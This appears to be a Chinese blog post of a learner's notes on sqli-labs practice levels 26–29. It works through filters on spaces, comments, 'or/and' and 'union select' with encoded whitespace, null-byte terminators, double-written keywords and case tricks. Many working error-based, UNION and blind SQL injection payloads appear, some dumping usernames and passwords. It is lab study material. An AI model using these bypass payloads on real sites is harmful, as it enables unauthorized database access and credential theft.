sql-labs闯关26~31

已于 2024-05-28 22:52:25 修改
阅读量2.3k 收藏 20
点赞数 4
分类专栏: sqli-labs 文章标签: sql web安全 学习 经验分享
于 2022-09-03 13:07:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44663230/article/details/126581636
版权

sql-labs闯关26~31:

友善爱国平等诚信民主富强爱国友善自由友善爱国平等诚信民主爱国爱国爱国

复习笔记1
第29~31关先跳过,回头再做

内容:

  1. sql-labs第26关(GET请求-基于错误-过滤空格和注释)
  2. sql-labs第26a关(GET请求-基于盲注-过滤空格和注释-字符型-单引号-括号)
  3. sql-labs第27关(GET请求-基于错误-过滤UNION&SELECT-字符型-单引号)
  4. sql-labs第27a关(GET请求-基于盲注-过滤UNION&SELECT-双引号)
  5. sql-labs第28关(GET请求-基于错误-过滤UNION&SELECT-字符型-单引号和括号)
  6. sql-labs第28a关(GET请求-基于盲注-过滤UNION&SELECT-单引号-括号)
  7. sql-labs第29关(GET请求-基于错误-IMPIDENCE MISMATCH-Having a WAF in front of web application)
  8. sql-labs第30关(GET请求-盲注-IMPIDENCE MISMATCH-Having a WAF in front of web application)
  9. sql-labs第31关(GET请求-盲注-IMPIDENCE MISMATCH-Having a WAF in front of web application)

1.sql-labs第26关

1.1.1
从欢迎界面可以知道,这关把空格和注释给过滤了,先输入?id=1
1.1.2
1.1.3
输入?id=1 and 1=2看到的账号是admin3,再输入?id=1 and 1=1,很好,也是一样的,不是数值型
1.1.4
用单引号判断法,输入?id=1'出现了报错信息,大致可以确定闭合点是’
1.1.5
不过这关把注释符过滤了,所以不能用常规的注释符绕过了。第一个反应是前面刚学到的特殊注释符;%00,输入?id=1';%00,看样子是成功绕过
1.1.6
输入?id=1' order by 3 ;%00判断列数,从页面报错信息来看过滤了or,那目前为止,知道了这关过滤了注释符、空格、or,所以在构造payload的时候,最好避免出现这些。or的话可以用双写来绕过,但是又过滤了空格,语句都挤在一起,根本没用,理论上讲用&&和||来替代and和or,而&&在url中具有特殊含义,需要先进行url编码成%26%26,就差个空格不知道怎么绕过。
1.1.7
首先,找了一些空格绕过技巧,大多都是用特殊字符来代替空格,看到这是不是以为这就结束了,你太天真了,我把所有绕过方法都尝试了一遍后,都没有成功绕过,又去看了源代码,这关过滤的属实多。不过我个人不知道是什么原因,但是有很多篇文章都提到是因为Apache 解析的问题Windows 无法使用,而Linux 下无这个问题。这属实难到我了,于是我又找了通关秘籍,跟着大佬的脚步,外挂冲关。我找到了面对空格过滤用报错注入来绕过的方法,避免了sql查询语句挤在一起的情况,接下来的流程我就很熟练了

SQL注入绕过技巧
SQL注入绕过技巧
sqli-labs26-32
sqli-labs通关笔记(1-30)
sqli-labs(26-28a)

?id=1' %26%26 extractvalue(1,concat(0x7e,database(),0x7e));%00

1.1.8
爆库

?id=1' %26%26 extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security') ,0x7e));%00

本来以为可以成功爆表,然而,我低估了过滤空格的影响,这堆又挤在一起了,只能用括号绕过
1.1.9
括号用在连续点,就成功了。有一说一,括号太多,我有点晕

?id=1' %26%26 extractvalue(1,concat(0x7e,(select(group_concat(table_name)) from (infoorrmation_schema.tables) where (table_schema='security')),0x7e));%00

1.1.10
爆表

?id=1' %26%26 extractvalue(1,concat(0x7e,(select(group_concat(column_name)) from (infoorrmation_schema.columns) where (table_schema='security') aandnd (table_name='users')),0x7e));%00

1.1.11
爆字段

?id=1' %26%26 extractvalue(1,concat(0x7e,(select (group_concat(username)) from (users)),0x7e));%00

1.1.12
爆数据

2.sql-labs第26a关

2.1.1
欢迎界面没改变,那过滤条件不变,输入?id=1正常显示
2.1.2
再输入?id=1',页面改变,但是没出现报错信息,这关不能再用报错注入了,再加上那些代替字符不能使用,所以只能用盲注了
2.1.3
再输入?id=1",页面又正常显示
2.1.4
输入?id=2' %26%26 '1'='1,查询1,就说明没有成功闭合
目前为止,不确定闭合点到底是社么,但肯定是有’,按照前面的闭合点经验,不外乎有以下两种种情况’)、')),实在不行再多搭配组合一下
2.1.5
输入?id=2') %26%26 '1'=('1,疑似闭合成功
2.1.6
输入?id=2查看值,验证闭合是否成功,确定闭合成功,然后开始盲注了,只写个样式,具体的去看前情回顾第八关
2.1.7
输入?id=2') %26%26 length(database())>5 %26%26 '1'=('1判断数据库长度
2.1.8
输入?id=2') %26%26 substr(database(),1,1)>'m' %26%26 '1'=('1判断数据库第一个字母

?id=2') %26%26 (select(count(table_name)) from (infoorrmation_schema.tables) where (table_schema='security'))>5 %26%26 '1'=('1

2.1.9
判断数据表张数

?id=2') %26%26 substr((select(table_name) from (infoorrmation_schema.tables) where (table_schema='security')(limit 0,1)),1,1)>'m' %26%26 '1'=('1

2.1.10
本来打算按照老方法用limit来提出第一张表再判断第一张数据表长度,结果又因为空格被过滤,语句挤在一起了,结果整的语句错误

?id=2') %26%26 substr((select(group_concat(table_name)) from (infoorrmation_schema.tables) where (table_schema='security')),1,1)>'m' %26%26 '1'=('1

2.1.11
那我只能把所有表都组合起来,一个字母一个字母慢慢试,再加上前面判断出数据表的张数,慢慢组合,总能试出正确表名

?id=2') %26%26 (select(count(column_name)) from (infoorrmation_schema.columns) where (table_schema='security') aandnd (table_name='users'))>5 %26%26 '1'=('1

2.1.12
判断字段个数

?id=2') %26%26 substr((select(group_concat(table_name)) from (infoorrmation_schema.tables) where (table_schema='security') aandnd (table_name='users')),1,1)>'m' %26%26 '1'=('1

2.1.13
判断字段的第一个字母

?id=2') %26%26 (select(count(username)) from (users))>5 %26%26 '1'=('1

2.1.14
判断数据有几条记录

?id=2') %26%26 substr((select(group_concat(username)) from (users)),1,1)>'m' %26%26 '1'=('1

2.1.15
判断数据的第一个字母

3.sql-labs第27关

3.1.1
从欢迎界面可以知道,这关把union和select给过滤了,先输入?id=1
3.1.2
再输入?id=1 and 1=2,判断类型,不是数值型
3.1.3
输入?id=1',有报错信息,大致确定闭合点是’,而且这也意味着我可以用报错注入来闯关,这样就可以绕过select和union的输入
3.1.4
输入?id=1' --+,没有成功闭合,那说明这关把注释也给过滤了
3.1.5
输入?id=1' ;%00,用特殊注释符绕过

?id=1' and extractvalue(1,concat(0x7e,database(),0x7e));%00

3.1.6
还过滤了空格,那就用符号来代替and
3.1.7
看看源代码,大小写都考虑到了,很贴心,不过感谢倒数两行,让我有了不一样的想法,我把其他字母改成大写,试试

union注入

3.1.8
抱着试试看的态度输入?id=1' %0aorder%0aby%0a3;%00,查询列数,没想到这关居然可以用%0a绕过空格过滤,%0b 也可以,其他的不行~
3.1.9
输入?id=0' %0a unioN %0a selecT %0a 1,2,3;%00,查看回显位。值得注意的是,输入id=-1会显示id=1的结果,猜测是因为把-当作注释过滤了
3.1.9
输入?id=0' %0a unioN %0a selecT %0a 1,database(),version();%00爆库

?id=0' %0a unioN %0a selecT %0a 1,2,(group_concat(table_name)) from (information_schema.tables) where (table_schema=database());%00

3.1.10
爆表

?id=0' %0a unioN %0a selecT %0a 1,2,(group_concat(column_name)) from (information_schema.columns) where (table_schema=database()) and (table_name='users') ;%00

3.1.11
爆字段

?id=0' %0a unioN %0a selecT %0a 1,(group_concat(username)),(group_concat(password)) from (users);%00

3.1.12
爆数据

报错注入

?id=1' %26%26 extractvalue(1,concat(0x7e,database(),0x7e));%00

3.1.13
爆库

?id=1' %26%26 extractvalue(1,concat(0x7e,(selecT (group_concat(table_name)) from (information_schema.tables) where (table_schema=database())),0x7e));%00

3.1.14
爆表

?id=1' %26%26 extractvalue(1,concat(0x7e,(selecT (group_concat(column_name)) from (information_schema.columns) where (table_schema=database()) and (table_name='users')),0x7e));%00

3.1.15
爆字段

?id=1' %26%26 extractvalue(1,concat(0x7e,(selecT (group_concat(username)) from (users)),0x7e));%00

3.1.16
爆数据

4.sql-labs第27a关

4.1.1
欢迎界面没啥变化,先输入?id=1
4.1.2
再输入?id=1 and 1=2,页面没变化,不是数值型
4.1.3
输入?id=1',页面没变化,闭合点不是’
4.1.4
再输入?id=1",页面发生改变,闭合点可能是",而且这关又不能用快乐的报错注入
4.1.5
输入?id=2" and "1"="1,判断双引号是否是闭合点,最终确定闭合点是"

union注入(步骤跟27差不多)

4.1.6
输入?id=0" %0a unioN %0a selecT %0a 1,2,3;%00,看看能不能用union注入,很好,可以!!!
4.1.7
输入?id=0" %0a unioN %0a selecT %0a 1,database(),version();%00爆库

?id=0" %0a unioN %0a selecT %0a 1,2,(group_concat(table_name)) from (information_schema.tables) where (table_schema=database());%00

4.1.8
爆表

%0a unioN %0a selecT %0a 1,2,(group_concat(column_name)) from (information_schema.columns) where (table_schema=database()) and (table_name='users') ;%00

4.1.9
爆字段

?id=0" %0a unioN %0a selecT %0a 1,(group_concat(username)),(group_concat(password)) from (users);%00

4.1.10
爆数据

盲注(步骤跟26a差不多)

4.1.11
输入?id=2" %26%26 length(database())>5;%00判断库长度
4.1.12
输入?id=2" %26%26 substr(database(),1,1)>'m';%00判断数据库第一个字母

?id=2" %26%26 (selecT(count(table_name)) from (information_schema.tables) where (table_schema=database()))>5 ;%00

4.1.13
判断数据表张数

?id=2" %26%26 substr((selecT(group_concat(table_name)) from (information_schema.tables) where (table_schema='security')),1,1)>'m' ;%00

4.1.14
判断表的第一个字母

?id=2" %26%26 (selecT(count(column_name)) from (information_schema.columns) where (table_schema='security') and (table_name='users'))=3 ;%00

4.1.15
判断字段的个数

?id=2" %26%26 substr((selecT(group_concat(table_name)) from (information_schema.tables) where (table_schema='security') and (table_name='users')),1,1)>'m' ;%00

4.1.16
判断字段的第一个字母

?id=2" %26%26 (selecT(count(username)) from (users))>5 ;%00

4.1.17
判断数据有几条记录

?id=2" %26%26 substr((selecT(group_concat(username)) from (users)),1,1)>'m' ;%00

4.1.18
判断数据的第一个字母

5.sql-labs第28关

5.1.1
从欢迎界面可以知道,这关把union和select给过滤了,先输入?id=1
5.1.2
再输入?id=1 and 1=2,判断类型,不是数值型
5.1.3
输入?id=1',页面改变,无报错信息,又要开始猜闭合点了
5.1.4
输入?id=1';%00,没闭合,页面显示错误
5.1.5
输入?id=1');%00,闭合。那么闭合点就是’),而且不能再用报错注入了
5.1.6
输入?id=1')%0a unioN %0a selecT %0a 1,2,3;%00,发现被过滤成这样,你赢了
5.1.7
再输入?id=1')%0b unioN %0b selecT %0b 1,2,3;%00,不忍直视
5.1.8
那就查看源码,问题应该出现在最后一行的过滤上,不过俺也不怎么懂
5.1.9
5.1.10
大概意思就是:union和select一起用的时候,会被过滤,那我要是双写,再在外面输入一层union和select,那么中间会被置换成空格,那外面那层可能会绕过
详细具体的说明请点击Sqli-labs - Less-28
5.1.11
输入?id=0') %0a unioN union%0a select %0a selecT %0a1,2,3;%00,查看回显位
5.1.12
输入?id=0')union(select%0d1,2,'3,查看回显位。我第一次见这个注释方式,剩下的步骤,请访问文章(手工)【sqli-labs28、28a】字符型注入、盲注、过滤
5.1.13
输入?id=0') %0a unioN union%0a select %0a selecT %0a 1,database(),version();%00,爆库

?id=0') %0a unioN union%0a select %0a selecT %0a 1,2,(group_concat(table_name)) from (information_schema.tables) where (table_schema=database());%00

5.1.14
爆表

?id=0') %0a unioN union%0a select %0a selecT %0a 1,2,(group_concat(column_name)) from (information_schema.columns) where (table_schema=database()) and (table_name='users') ;%00

5.1.15
爆字段

?id=0') %0a unioN union%0a select %0a selecT %0a 1,(group_concat(username)),(group_concat(password)) from (users);%00

5.1.16
爆数据

6.sql-labs第28a关

6.1.1
换关卡的时候,顺手点了运行,这个反馈界面出乎意料,暂且放这
6.1.2
输入?id=1
6.1.3
输入?id=1 and 1=2
6.1.4
输入?id=1'
6.1.5
再输入?id=1';%00
6.1.6
再输入?id=1');%00,成功闭合。确定闭合点是’)

union(跟28关一样的操作)

6.1.7
从刚开始的换关结果显示,就说明union似乎可以使用,输入?id=0') %0a unioN union%0a select %0a selecT %0a1,2,3;%00,尝试查看回显位
6.1.8
输入?id=0') %0a unioN union%0a select %0a selecT %0a 1,database(),version();%00爆库
自己翻28关,payload都不需要改,我懒的输入截图描述了,累了

盲注(步骤跟27a差不多)

6.1.9
输入?id=2') %26%26 length(database())>5;%00,判断库长度
6.1.10
输入?id=2') %26%26 substr(database(),1,1)>'m';%00判断数据库第一个字母

?id=2') %26%26 (selecT(count(table_name)) from (information_schema.tables) where (table_schema=database()))>5 ;%00

6.1.11
输入判断数据表张数是否>5张

?id=2') %26%26 substr((selecT(group_concat(table_name)) from (information_schema.tables) where (table_schema='security')),1,1)>'m' ;%00

6.1.12
判断表的第一个字母是否>‘m’

?id=2')  %26%26 (select(count(column_name)) from (information_schema.columns) where (table_schema='security') and (table_name='users'))=3 ;%00

6.1.13
判断字段的个数

?id=2')  %26%26 substr((selecT(group_concat(table_name)) from (information_schema.tables) where (table_schema='security') and (table_name='users')),1,1)='u' ;%00

6.1.14
判断字段的第一个字母是否=‘u’

?id=2')  %26%26 (select(count(username)) from (users))>5 ;%00

6.1.15
判断数据记录数是否>5

?id=2') %26%26 substr((selecT(group_concat(username)) from (users)),1,1)>'m' ;%00

6.1.16
判断数据的第一个字母是否>‘m’

7.sql-labs第29关

这关的欢迎词又变了,This Site Protected by world’s Best firewall (该网站由世界上最好的防火墙保护)。对于这关要测试什么,摸不着头脑,先按照老样子注入试试,有问题再百度
7.1.1
输入?id=1 and 1=2
7.1.2
输入?id=1',看到了久违的报错信息,那试试报错注入

?id=1' and extractvalue(1,concat(0x7e,database(),0x7e))--+

7.1.3
成功爆库,我开始迷茫,这关到底考干啥,也许是接下来的步骤被过滤了

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+

7.1.4
成功爆表

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e))--+

7.1.5
成功爆字段

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(username) from users),0x7e))--+

7.1.6
成功爆数据,虽然成功了,但是俺不理解。我去翻翻百度,这是我第一次做出来还要去找百度

sqli-labs(29-31)
sqli-labs(29)
sqli-labs(29-31关)

7.1.7
要是想要学习详细操作,请点击第三个链接,我回头再尝试

8.sql-labs第30关

9.sql-labs第31关

专业划水选手
关注
  • 4
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL初实践2)SQL报错注入
m0_64417923的博客
05-07 287
使用Extractvalue函数进行报错注入: 首先,Extractvalue函数对于“~”不能识别,“~”的ASCII码对应的是0x7e。 1.查询数据库名称 id=1 and extractv 1 and extractvalue(1,concat(0x7e,(select database()))) alue("anything",concat(0x7e,(select database())))# 得到 数据库名称:sqli 2.查询表名 1 union select 1,e.
sql-labs通关技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
sqli-labs/Less-26
m0_71299382的博客
11-20 1382
sqli-labs第二十六关
sqli-labs第26~28关
yuqnqi的博客
05-13 406
查看源码黑名单,过滤了 or,and , /* , – , # , 空格 , /\s 代表中的一个空白字符(可能是空格、、其他空白) 即 \s 用于匹配空白字符。我们常见的绕过空格的就是多行注释,/**/但这里过滤了,不太行啊将空格,or,and,/*,#,--,/等各种符号过滤,此处对于and,or的处理方法不再赘述,参考25.此处我们需要说明两方面:对于注释和结尾字符的我们此处只能利用构造一个 ' 来闭合后面到 ';对于空格,有较多的方法:%09 TAB键(水平)%0a 新建一行。
pikachu靶场(sql注入通关教程-上)
最新发布
记录学习
05-19 821
pikachu靶场通关教程-上
SQL-labs的第26a关——空格和注释被过滤 延时盲注(Get)
qq_73393033的博客
08-04 206
注意该关的or和and也被过滤了。
SQL-labs的第27关——union和select被屏蔽 报错注入(Get)
qq_73393033的博客
08-04 434
注意:该关的空格、注释也被屏蔽了。
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
SQL-li-labs则是针对SQL注入攻击的练习平台,帮助学习者理解如何预防这种类型的攻击。 首先,我们来详细了解一下PHPStudy。PHPStudy提供了一个简单的界面来管理PHP版本切换、Apache和Nginx服务器的启动与停止,以及...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs闯关小游戏21-65.docx
10-23
sqli-labs是一个专门用于学习和练习SQL注入技巧的平台,其关卡设计由易到,帮助用户深入理解这种攻击方式。 在第21关中,我们可以看到利用了`UNION SELECT`语法,这是SQL注入的经典手法,通过将恶意SQL插入到合法...
sql-labs
03-07
"SQL-Labs" 是一个可能的数据库学习平台或者是一系列SQL练习题目集合,主要用于帮助用户提升SQL查询和数据处理技能。由于没有具体的标签提供更多信息,我们可以假设这是一个综合性的SQL实践项目,涵盖了各种SQL语言...
sqli-labs第二十七二十七a关
m0_73248913的博客
02-22 182
sqlilabs第二十七二十七a关
sqli-labs 26a
weixin_47300936的博客
09-04 659
mysql会将'2'当作true,然后true and true为true,true则为1。执行的语句则是where id = '2' and '1'='1'执行的语句则是where id = ('2' and '1'='1')后面依次判断出字段名为id,username,password。,查询语句即为where id = ('$id'),查询语句即为where id = '$id'由图可知,回显id为1的信息,即闭合为')即2' and '1'='1。回显会是id为2的信息。回显会是id为1的信息。
Sqlilabs-26
KAKA的博客
07-14 2288
来到了 Sqlilabs 大魔王的第 26 关关卡… 来到页面就看到大大的,“你的所有空格和过滤符都属于我们“,这得到机智的你吗? 在此说下常见的绕过方法有:(本来这应该在 25 关卡就说的,忘了…) 双写绕过 大小写绕过 编码绕过,如:hex || URL 注释符绕过,如:/!select/ 替换:如 and 可替换为 && ,or 可替换为 || 空格的话我们可以 url 绕过:%a0 || %0b 等等,过滤字符我们可以用 and || or 替代 有了上述的神兵利器,那就很
(手工)【sqli-labs2626a】拼接注入、过滤后注入
07-12 686
SQL-拼接、过滤后注入】
sqli-labs(26)
weixin_30552635的博客
05-28 521
0X01 测试闭合 单引号报错 双引号不报错 ’闭合 构造语句 过滤了空格和and ?id=1' anandd 1=1%23 ?id=1'+anandd+1=1%23 百度一下 一去看源码 真的顶不住 那我们就别光想着正确的地方输入了 我们用报错注入 ?id=1'||updatexml(1,concat(':',(select database...
sqli-labs(26a)
weixin_30920853的博客
05-28 702
0x01偷偷看一波源码 和26关一样 闭合变成了’)而已 0X01构造语句爆库名 这是百度到的 第一个 ' 首先闭合id='$id' 中的',%a0是空格的意思,(ps:此处我的环境是ubuntu14.04+apache+mysql+php,可以解析%a0,此前在windows+wamp测试,不能解析%a0,有知情的请告知。)同时%0b也是可以通过测试的,其他的经测试是不行的。||是或者...
sqli-labs(27)
weixin_30901729的博客
05-28 433
0X01 先查询闭合 ?id=1' 报错 ?id=1'' 正确 知道是’的闭合语句 0X02那么开始我们的注入之旅 空格过滤了 尝试一下%0a绕过 #也被过滤了 那么用and '1'='1构造闭合 ?id=1'||'1'='1 显示正确 我们来爆一下数据名称 哦豁 union select 被过滤了 /?id=1'%0Aunion%0Asel...
SQLi LABS Less 26a 联合注入+布尔盲注
热门推荐
wangyuxiang946的博客
08-15 1万+
SQLi 第26a关,SQLi-LABS Less-26a,SQLi-LABS Less 26a,SQLiLABS Less26a,SQLi Less 26a

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值